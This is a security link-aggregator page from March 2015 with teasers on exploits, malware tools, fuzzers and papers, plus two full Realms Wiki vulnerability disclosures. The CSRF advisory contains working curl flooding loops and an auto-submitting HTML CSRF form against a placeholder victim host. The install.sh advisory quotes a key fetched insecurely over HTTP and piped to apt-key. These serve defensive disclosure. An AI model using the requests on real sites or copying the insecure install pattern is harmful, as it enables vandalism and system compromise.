Stealing files from web servers by exploiting a popular PDF generator

March 25, 2015, 8:19 am

≪ Previous: Surgeon with a Shotgun! – Memory Forensics

TCPDF is one of the most popular PHP libraries for creating PDF documents.

“TCPDF is now one of the world’s most active Open Source projects, used daily by millions of users and included in thousands of CMS and Web applications.”

more here............http://labs.detectify.com/post/114572572966/stealing-files-from-web-servers-by-exploiting-a

↧

CYNOMIX

March 25, 2015, 8:20 am

≫ Next: A Peek Under the Hood

≪ Previous: Stealing files from web servers by exploiting a popular PDF generator

New malware visualization tool from Invincea here......http://www.cynomix.org/

↧

A Peek Under the Hood

March 25, 2015, 9:06 am

≫ Next: SAMC: Semantic-aware model checking for fast discovery of deep bugs in cloud systems

≪ Previous: CYNOMIX

ZeroDB is an end-to-end encrypted database that lets clients run queries without exposing the decrypted data to the server. The familiar client-server architecture stays the same, but query logic and decryption keys are pushed client-side. Since the server has no insight into the nature of the data, the risk is much lower. Even if an attacker successfully infiltrates the server, she won't have access to the unencrypted data.

more here.........http://blog.zerodb.io/a-peek-under-the-hood/

↧

SAMC: Semantic-aware model checking for fast discovery of deep bugs in cloud systems

March 25, 2015, 10:58 am

≫ Next: New banker 'Slave' hitting Polish Banks

≪ Previous: A Peek Under the Hood

This is the second of three papers we’ll be looking at this week on the theme of verifying correctness of, and catching bugs in, distributed systems. Yesterday we saw the Statecall Policy Language and associated tool chain which can verify behaviour of automata at a single node in a distributed system. Today we look at the harder problem of distributed model checking.

more here.........http://blog.acolyer.org/2015/03/25/samc-semantic-aware-model-checking-for-fast-discovery-of-deep-bugs-in-cloud-systems/

↧

New banker 'Slave' hitting Polish Banks

March 25, 2015, 11:00 am

≫ Next: Missed this one! Dissecting a “Six-Figures-A-Month” video ad fraud operation

≪ Previous: SAMC: Semantic-aware model checking for fast discovery of deep bugs in cloud systems

We have spotted a new banking trojan in the wild that uses JSON formatted webinjects. After that so many Zeus-like webinjects around, this was kind of refreshing. Currently this banker only have targets in Poland. We are analyzing injects, as they are capable of using ATS.

more here.........http://securityblog.s21sec.com/2015/03/new-banker-slave-hitting-polish-banks.html?utm_source=twitterfeed&utm_medium=twitter

↧

Missed this one! Dissecting a “Six-Figures-A-Month” video ad fraud operation

March 25, 2015, 11:05 am

≫ Next: Paper: StackArmor: Comprehensive Protection from Stack-based Memory Error Vulnerabilities for Binaries

≪ Previous: New banker 'Slave' hitting Polish Banks

A relatively simple fraud scheme within the video RTB ecosystem is costing advertisers such as Verizon, Netflix, Fedex, KFC and Smirnoff among others up to 500 000 USD / month. While they may believe that their ads are reaching premium inventory, in fact they are appearing on file sharing, piracy and pornographic websites through this arbitrage scheme.

more here......http://blog.enbrite.ly/?p=141

↧

Paper: StackArmor: Comprehensive Protection from Stack-based Memory Error Vulnerabilities for Binaries

March 25, 2015, 12:06 pm

≫ Next: Exploiting CVE-2015-0311, Part II: Bypassing Control Flow Guard on Windows 8.1 Update 3

≪ Previous: Missed this one! Dissecting a “Six-Figures-A-Month” video ad fraud operation

Abstract—StackArmor is a comprehensive protection technique
for stack-based memory error vulnerabilities in binaries. It
relies on binary analysis and rewriting strategies to drastically reduce
the uniquely high spatial and temporal memory predictability
of traditional call stack organizations. Unlike prior solutions,
StackArmor can protect against arbitrary stack-based attacks,
requires no access to the source code, and offers a policy-driven
protection strategy that allows end users to tune the securityperformance
tradeoff according to their needs. We present an
implementation of StackArmor for x86 64 Linux and provide a
detailed experimental analysis of our prototype on popular server
programs and standard benchmarks (SPEC CPU2006). Our
results demonstrate that StackArmor offers better security than
prior binary- and source-level approaches, at the cost of only modest
performance and memory overhead even with full protection.

more here.......http://www.few.vu.nl/~da.andriesse/papers/ndss-2015.pdf

↧

Exploiting CVE-2015-0311, Part II: Bypassing Control Flow Guard on Windows 8.1 Update 3

March 25, 2015, 3:16 pm

≫ Next: moflow

≪ Previous: Paper: StackArmor: Comprehensive Protection from Stack-based Memory Error Vulnerabilities for Binaries

At the beginning of March we published a blog post analyzing CVE-2015-0311, a Use-After-Free vulnerability in Adobe Flash Player, and we outlined how to exploit it on Windows 7 SP1 machines. As we mentioned at the end of that article, the exploitation process explained there doesn’t apply to more recent versions of Windows like Windows 8.1 with Update 3, because of a new exploit mitigation technology called Control Flow Guard (CFG).

more here..........https://blog.coresecurity.com/2015/03/25/exploiting-cve-2015-0311-part-ii-bypassing-control-flow-guard-on-windows-8-1-update-3/

↧

moflow

March 25, 2015, 4:29 pm

≫ Next: CSRF in Realms Wiki

≪ Previous: Exploiting CVE-2015-0311, Part II: Bypassing Control Flow Guard on Windows 8.1 Update 3

American Fuzzy Lop + Dyninst == AFL Fuzzing blackbox binaries

The tool has two parts. The instrumentation tool and the instrumentation
library. Instrumentation library has an initialization callback and basic
block callback functions which are designed to emulate what AFL is doing
with afl-gcc/afl-g++/afl-as.
Instrumentation tool (afl-dyninst) instruments the supplied binary by
inserting callbacks for each basic block and an initialization
callback either at _init or at specified entry point.

more here.........https://github.com/vrtadmin/moflow/tree/master/afl-dyninst

↧

CSRF in Realms Wiki

March 25, 2015, 4:57 pm

≫ Next: Remote Code Execution in Realms Wiki install.sh

≪ Previous: moflow

CSRF in Realms Wiki
Vulnerability Report
Mar 19, 2015

Product: Realms Wiki
Website: http://realms.io/
Github: https://github.com/scragg0x/realms-wiki
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:C/A:N)

Realms Wiki is vulnerable to Cross-Site Request Forgery on all posts. Especially of concern are New, Edit, and Revert. If Realms Wiki had significant authentication mechananisms such as site administration, user administration, and so forth, these too would be vulnerable to CSRF and the harm would be increased. A command-line example of the post to create a new page is as simple as:

curl 'http://wiki.victim.example.com/test' --data 'name=test&message=passwords+and+stuff&content=%60%60%60%0A123456%0Apassword%0Alove%0Asex%0Asecret%0Agod%0A%60%60%60%0A'

To create 600 pages:

for i in $(seq 2 600); do curl -i 'http://wiki.victim.example.com/test'"$i" --data 'name=test'"$i"'&message=passwords+and+stuff&content=csrf+is+fun'"$i"; done

To create a page for every word in the dictionary:
while read word; do curl -i 'http://wiki.victim.example.com/'"$word" --data 'name='"$word"'&message=csrf&content=did+you+know+'"$word"; done </usr/share/dict/words

The repro for the CSRF is:

<html>
<body onLoad="document.forms[0].submit();">
<form action="http://wiki.victim.example.com/csrf-awesome" method="POST">
<input type="hidden" name="name" value="csrf_awesome" />
<input type="hidden" name="message" value="whatever data we want" />
<input type="hidden" name="content" value="csrf is fun 1234" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

Disclosure Timeline:
Found: Thu, Mar 19, 2015
Reported to author: Thu, Mar 19, 2015
Full Disclosure: Thu, Mar 25, 2015

The reason I have chosen to advance the timeline beyond what most people consider reasonable is because I reported a difficult to exploit remote code execution vulnerability to the author on Sun, 15 Mar 2015 and heard no response. Today makes 10 days since I reported the vulnerability and I have heard nothing back. Therefore I am using full disclosure to warn users that their sites can be CSRFed. I am also posting the remote code execution vulnerability along with this (which is lower severity due to the difficulty in exploitation).

Thanks to those who have written this wiki. It's well-written and will need some bug fixes. I plan on making many improvements to this wiki in the future.

Regards,
Javantea

↧

Remote Code Execution in Realms Wiki install.sh

March 25, 2015, 4:58 pm

≫ Next: Detecting DLL Hijacking on Windows

≪ Previous: CSRF in Realms Wiki

Remote Code Execution in realms-wiki install.sh
by Javantea
Mar 15, 2015

Product: Realms Wiki
Website: http://realms.io/
Github: https://github.com/scragg0x/realms-wiki
CVSS Score: 7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)

On line 20 of realms-wiki install.sh, a GPG key that is requested via HTTP is added to the apt keyring. A remote attacker that has a man-in-the-middle (via ARP spoof, DNS spoof, or HTTP man-in-the-middle) against the person running install.sh can use this to sign arbitrary packages that are installed. This gives the remote attacker root privileges on the affected machine.

install.sh:20:
wget -qO - http://packages.elasticsearch.org/GPG-KEY-elasticsearch | sudo apt-key add -

This line of code was probably copied and pasted from someone else's code. Even if you don't run Realms Wiki, you may have run this code when you installed a different project. As you can see, this key is being used all over the place.
https://github.com/search?q=GPG-KEY-elasticsearch&type=Code&utf8=%E2%9C%93

It seems to affect more than just Ubuntu and Debian systems, some people import the same key into RedHat's keyring. Gentoo and RedHat-derived systems running Realms Wiki appear to be unaffected.

While many vendors consider this attack theoretical, let me ensure you that it is practical and easily accomplished in a datacenter, a broadband network, or a wireless network. Practically any person that runs install.sh as root can be compromised.

The CVSS score for this vulnerability is inflated beyond its actual impact. Even though this is remote code execution, the attacker has to be in place during the installation which limits the window of attack considerably. This doesn't mean that this attack isn't a serious issue.

Disclosure Timeline:
Found: Sun, Mar 15, 2015
Reported to author: Sun, Mar 15, 2015
Full Disclosure: Thu, Mar 25, 2015

I have chosen to release after 10 days because I have heard no response from the author. I do not wish to give attackers any further window to exploit these vulnerabilities. Therefore I am using full-disclosure to warn users that their sites can be CSRFed and if they install it when an attacker has a man-in-the-middle, their entire system can become compromised. I am also posting the CSRF vulnerability along with this (which is higher severity due to the lower difficulty in exploitation).

Thanks to those who have written this wiki. It's well-written and will need some bug fixes. I plan on making many improvements to this wiki in the future.

Regards,
Javantea

↧

Detecting DLL Hijacking on Windows

March 25, 2015, 5:37 pm

≫ Next: Deep Dive Into Stageless Meterpreter Payloads

≪ Previous: Remote Code Execution in Realms Wiki install.sh

Initially identified fifteen years ago, and clearly articulated by a Microsoft Security Advisory, DLL hijacking is the practice of having a vulnerable application load a malicious library (allowing for the execution of arbitrary code), rather than the legitimate library by placing it at a preferential location as dictated by the Dynamic-Link Library Search Order which is a pre-defined standard on how Microsoft Windows searches for a DLL when the path has not been specified by the developer.

Despite published advice on secure development practices to mitigate this threat, being available for several years, this still remains a problem

more here...........http://digital-forensics.sans.org/blog/category/incident-response

↧

Deep Dive Into Stageless Meterpreter Payloads

March 25, 2015, 5:39 pm

≫ Next: symboliclink-testing-tools

≪ Previous: Detecting DLL Hijacking on Windows

Metasploit has long supported a mixture of staged and stageless payloads within its toolset. The mixture of payloads gives penetration testers a huge collection of options to choose from when performing exploitation. However, one option has been missing from this collection, and that is the notion of a stageless Meterpreter payload. In this post, I’d like to explain what this means, why you should care, and show how the latest update to Metasploit and Meterpreter provides this funky new feature as portended by Tod's last Wrapup post.

more here.......https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads

↧

symboliclink-testing-tools

March 26, 2015, 1:04 am

≫ Next: MFFA - Media Fuzzing Framework for Android

≪ Previous: Deep Dive Into Stageless Meterpreter Payloads

This is a small suite of tools to test various symbolic link types of Windows
more here.....https://github.com/google/symboliclink-testing-tools

↧

MFFA - Media Fuzzing Framework for Android

March 26, 2015, 1:06 am

≫ Next: sorrow fuzzing library

≪ Previous: symboliclink-testing-tools

The main idea behind this project is to create corrupt but structurally valid media files, direct them to the appropriate software components in Android to be decoded and/or played and monitor the system for potential issues (i.e system crashes) that may lead to exploitable vulnerabilities. Custom developed Python scripts are used to send the malformed data across a distributed infrastructure of Android devices, log the findings and monitor for possible issues, in an automated manner. The actual decoding of the media files on the Android devices is done using the Stagefright command line interface. The results are sorted out, in an attempt to find only the unique issues, using a custom built triage mechanism.

more here......https://github.com/fuzzing/MFFA

↧

sorrow fuzzing library

March 26, 2015, 1:09 am

≫ Next: troubleshooter- The revenge of GingerBreak

≪ Previous: MFFA - Media Fuzzing Framework for Android

Sorrow is Joi's evil twin. It exists to create malicious payloads based on Joi validator schemas that will pass said validators.

more here...https://github.com/liftsecurity/sorrow

↧

troubleshooter- The revenge of GingerBreak

March 26, 2015, 3:29 am

≫ Next: Paper: Stickler: Defending Against Malicious CDNs in an Unmodified Browser

≪ Previous: sorrow fuzzing library

Abstract: This paper demonstrates vulnerabilities within the SELinux framework as well as shortcomings in the type enforcement setup. I will show how to deconstruct a SELinux setup with some simple 80's style exploit techniques.

more here...........https://github.com/stealth/troubleshooter

↧

Paper: Stickler: Defending Against Malicious CDNs in an Unmodified Browser

March 26, 2015, 3:31 am

≫ Next: CapTipper 0.2 released!

≪ Previous: troubleshooter- The revenge of GingerBreak

Abstract—Website publishers can derive enormous performance
benefits and cost savings by directing traffic to their
sites through content distribution networks (CDNs). However,
publishers who use CDNs today must trust their CDN not to
modify the site’s JavaScript, CSS, images or other media en
route to end users. A CDN that violates this trust could inject ads
into websites, downsample media to save bandwidth or, worse,
inject malicious JavaScript code to steal user secrets it could
not otherwise access. We present Stickler, a system for website
publishers that guarantees the end-to-end authenticity of content
served to end users while simultaneously allowing publishers
to reap the benefits of CDNs. Crucially, Stickler achieves these
guarantees without requiring modifications to the browser

more here..........http://www.henrycg.com/files/academic/papers/w2sp15stickler.pdf

↧

CapTipper 0.2 released!

March 26, 2015, 3:36 am

≫ Next: Thousands of compromised WordPress websites redirect to exploit kits

≪ Previous: Paper: Stickler: Defending Against Malicious CDNs in an Unmodified Browser

CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic.
CapTipper sets up a web server that acts exactly as the server in the PCAP file,
and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations found.

The tool provides the security researcher with easy access to the files and the understanding of the network flow, and is useful when trying to research exploits, pre-conditions, versions, obfuscations, plugins and shellcodes.

more here.........http://www.omriher.com/2015/03/captipper-02-released.html

↧

Thousands of compromised WordPress websites redirect to exploit kits

March 26, 2015, 7:11 am

≫ Next: dnscat2 beta release!

≪ Previous: CapTipper 0.2 released!

For the past weeks a spike has been seen in the amount of WordPress websites embedding iframes to exploit kits; more than just Fiesta has been seen. There are thousands of websites currently embedding the iframes, from what little data I have which is only some 3000~ websites it is most likely just a small section of it all.

more here........http://blog.0x3a.com/post/114659871819/thousands-of-compromised-wordpress-websites

↧

Latest Images